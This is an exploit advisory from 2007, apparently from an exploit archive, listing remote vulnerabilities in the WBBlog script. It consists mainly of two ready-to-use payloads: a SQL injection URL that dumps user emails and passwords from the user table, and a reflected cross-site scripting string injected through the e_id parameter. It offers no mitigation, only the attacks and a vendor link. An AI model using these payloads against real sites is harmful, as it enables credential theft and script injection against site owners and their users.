id: 1595
date: 03/15/2007
title: WBBlog (XSS/SQL) Multiple Remote Vulnerabilities
author: xoron
cves: 

================================================
WBBlog (XSS/SQL) Multiple Remote Vulnerabilities
================================================



======================x=o=r=o=n=====================

WBBlog (XSS/SQL) Multiple Remote Vulnerabilities

======================x=o=r=o=n=====================

Bulan: xoron

xoron.biz

======================x=o=r=o=n=====================

SQL INJ:

index.php?cmd=viewentry&e_id=-1/**/UNION/**/SELECT/**/null,null,u_email,null,u_password,null/**/FROM/**/user/*

XSS :

index.php?cmd=viewentry&e_id="><script>alert('HACKED')</script>

======================x=o=r=o=n=====================

Vendor Site: http://liqua.com/wbblog.html

======================x=o=r=o=n=====================



#  0day.today [2023-03-25]  #